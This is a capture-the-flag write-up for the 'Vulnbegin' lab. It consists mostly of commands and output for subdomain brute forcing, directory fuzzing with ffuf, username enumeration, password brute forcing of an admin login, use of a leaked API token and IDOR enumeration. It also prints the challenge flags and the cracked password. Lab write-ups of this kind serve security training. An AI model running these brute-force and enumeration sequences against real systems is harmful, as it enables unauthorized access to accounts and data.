Vulnbegin
Subdomain Discovery
DNS Infos
nslookup -type=any vulnbegin.co.uk 8.8.8.8
Server: 8.8.8.8
Address: 8.8.8.8#53
Non-authoritative answer:
Name: vulnbegin.co.uk
Address: 68.183.255.206
vulnbegin.co.uk nameserver = ns1.digitalocean.com.
vulnbegin.co.uk nameserver = ns2.digitalocean.com.
vulnbegin.co.uk nameserver = ns3.digitalocean.com.
vulnbegin.co.uk
origin = ns1.digitalocean.com
mail addr = hostmaster.vulnbegin.co.uk
serial = 1626211765
refresh = 10800
retry = 3600
expire = 604800
minimum = 1800
vulnbegin.co.uk text = "[^FLAG^BED649C4DB2DF265BD29419C13D82117^FLAG^]"
Authoritative answers can be found fromDNS Bruteforce
dnsrecon -d vulnbegin.co.uk -D ~/Dokumente/ctfchallenge/wordlists/subdomains.txt -t brt
[*] Performing host and subdomain brute force against vulnbegin.co.uk
[*] A server.vulnbegin.co.uk 68.183.255.206
[*] A www.vulnbegin.co.uk 68.183.255.206
[+] 2 Records Foundcurl -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk{"error":"User Not Authenticated","flag":"[^FLAG^E858ED9649E57BECE9ACD1A4C60D3446^FLAG^]"}%
SSL Certificate Records
Common Name
Matching Identities
v64hss83.vulnbegin.co.uk
v64hss83.vulnbegin.co.uk
vulnbegin.co.uk
*.vulnbegin.co.uk / vulnbegin.co.uk
Checking Domain v64hss83.vulnbegin.co.uk
curl -H "Cookie: ctfchallenge=CENSORED" http://v64hss83.vulnbegin.co.uk[^FLAG^047524FE61AE6B5FD1D184994C7322FC^FLAG^]
Content Discovery
ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -u http://www.vulnbegin.co.uk/FUZZ -mc all -fc 404=> Results <=
cpadmin
css
js
robots.txtcurl -H "Cookie: ctfchallenge=CENSORED" http://www.vulnbegin.co.uk/robots.txt
User-agent: *
Disallow: /secret_d1rect0y/% curl -H "Cookie: ctfchallenge=CENSORED" http://www.vulnbegin.co.uk/secret_d1rect0y
[^FLAG^2B22E2CB70E218510802B0359488F6A2^FLAG^]% Brute Force
Checking for Valid Users
./ffuf -w ~/Dokumente/ctfchallenge/wordlists/usernames.txt -X POST -d "username=FUZZ&password=x" -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnbegin.co.uk/cpadmin/login -fr 'Username is invalid'
admin [Status: 200, Size: 1483, Words: 422, Lines: 37]Bruteforcing Password
./ffuf -w ~/Dokumente/ctfchallenge/wordlists/passwords.txt -X POST -d "username=admin&password=FUZZ" -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnbegin.co.uk/cpadmin/login -fr 'Password is invalid'
159753 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 31ms]Flag
Content Discovery #2
./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -u http://www.vulnbegin.co.uk/cpadmin/FUZZ -mc all -fc 404
env [Status: 200, Size: 111, Words: 2, Lines: 1]API Recon
Check the API
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk
{"messaged":"User Authenticated","flag":"[^FLAG^0BDC60CC5E283476E7107C814C18DCCF^FLAG^]"}%Search for API Endpoints
./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.1 -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" -u http://server.vulnbegin.co.uk/FUZZ -mc all -fc 404
user [Status: 200, Size: 89, Words: 1, Lines: 1]curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user
{"id":27,"endpoint":"\/user\/27"}curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/27
{"id":27,"username":"vulnbegin_website","endpoint":"\/user\/27\/info"}curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/27/info
{"id":27,"username":"vulnbegin_website","description":"User for the main website","flag":"[^FLAG^7B3A24F3368E71842ED7053CF1E51BB0^FLAG^]"}% Check for IDOR
seq 1 100 | ./ffuf -w - -t 1 -p 0.1 -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" -u http://server.vulnbegin.co.uk/user/FUZZ -mc all -fc 404
5 [Status: 403, Size: 48, Words: 9, Lines: 1, Duration: 32ms]
27 [Status: 200, Size: 70, Words: 1, Lines: 1, Duration: 31ms]curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/5
["You do not have permission to view this user"]curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/5/info
{"id":5,"username":"admin","description":"admin for the server","flag":"[^FLAG^3D82BE780F46EE86CE060D23E6E80639^FLAG^]"}Last updated